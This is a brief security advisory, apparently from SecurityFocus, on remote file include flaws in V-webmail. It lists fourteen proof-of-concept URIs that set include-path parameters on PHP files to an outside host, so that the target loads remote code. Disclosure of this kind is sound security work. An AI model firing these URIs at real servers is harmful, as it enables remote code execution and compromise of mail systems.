V-webmail Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues using a browser.

The following proof-of-concept URIs are available:

http://www.example.com/path/includes/pear/Mail/RFC822.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Net/POP3.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Net/Socket.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/XML/Parser.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/XML/Tree.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Console/Getopt.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/System.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Log.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/File.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/prepend.php?CONFIG[includes]=http://www.example2.com
http://www.example.com/path/includes/prepend.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/email.list.search.php?CONFIG[includes]=http://www.example2.com
http://www.example.com/path/includes/cachedConfig.php?CONFIG[pear_dir]=http://www.example2.com


 

Privacy Statement
Copyright 2010, SecurityFocus